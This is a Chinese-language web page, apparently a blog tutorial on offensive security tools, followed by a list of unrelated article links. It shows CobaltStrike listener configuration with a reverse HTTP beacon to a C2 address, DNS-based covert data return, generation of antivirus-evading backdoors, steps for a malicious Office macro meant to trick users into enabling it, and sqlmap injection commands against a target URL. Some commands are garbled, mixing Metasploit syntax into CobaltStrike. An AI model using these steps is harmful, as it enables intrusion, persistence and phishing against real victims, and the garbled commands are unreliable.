当前位置: 首页 > news >正文

安全工具配置

news 2025/5/23 7:15:30

3.1 工具使用

3.1.1 CobaltStrike 高级用法

监听器(Listener)配置

- HTTP/HTTPS监听器:

# 配置HTTP监听器(默认端口80) set payload windows/beacon_http/reverse_http set Host 192.168.1.10 set Port 80 exploit -j

- DNS监听器:绕过网络监控,通过DNS协议回传数据(需配置域名解析指向C2服务器)。

后门生成与权限维持

- Windows可执行文件:

bash # 生成免杀后门(使用混淆模板) ./agscript.sh <团队服务器> <用户> <密码> artifact-kit/pe_templates_template.x64.exe

- Office宏后门:

1. 生成宏Payload:Attacks → Packages → Microsoft Office Macro。

2. 插入Word文档,诱导用户启用宏触发上线。

3.1.2 Sqlmap 自动化注入实战

基础命令

# 检测目标是否存在注入  

sqlmap -u "http://target.com/page?id=1" --batch

# 获取数据库名称  

sqlmap -u "http://target.com/page?id=1" --dbs
http://www.xdnf.cn/news/544933.html

相关文章:

  • 21. 自动化测试框架开发之Excel配置文件的测试用例改造
  • [特殊字符] React Fiber架构与Vue设计哲学撕逼实录
  • 【Linux笔记】——简单实习一个日志项目
  • 以太联 - Intellinet 闪耀台北 SecuTech 国际安全科技应用博览会
  • C及C++的音频库与视频库介绍
  • MATLAB实现GAN用于图像分类
  • Spring Boot 集成 Elasticsearch【实战】
  • JAVA EE(进阶)_HTML
  • PHP、JAVA、Shiro反序列化
  • Index-AniSora技术升级开源:动漫视频生成强化学习
  • MySQL 8.0 OCP 英文题库解析(六)
  • 系统架构设计(十七):微服务数据一致性和高可用策略
  • anaconda、miniconda、conda的关系及miniconda安装
  • 虚拟环境中VSCode运行jupyter文件
  • 2025年AI搜索引擎发展洞察:技术革新与市场变革
  • 数据库----软考中级软件设计师(自用学习笔记)
  • ShenNiusModularity项目源码学习(27:ShenNius.Admin.Mvc项目分析-12)
  • [创业之路-369]:企业战略管理案例分析-8-战略制定-战略制定起点:差距分析
  • Jenkins服务器配置密钥对
  • 三、【数据建模篇】:用 Django Models 构建测试平台核心数据
  • windows维护工具vip版
  • Django基础(二)Django 项目基础操作
  • NLP学习路线图(二): 概率论与统计学(贝叶斯定理、概率分布等)
  • GO语言学习(六)
  • WSL虚拟机整体迁移教程(如何将WSL从C盘迁移到其他盘)
  • 【计算机方向海外优质会议推荐】第二届图像处理、机器学习与模式识别国际学术会议(IPMLP 2025)
  • 下载Ubuntu 64 位
  • 图像处理基础知识
  • YOLOv8 的双 Backbone 架构:解锁目标检测新性能
  • Java EE初阶——定时器和线程池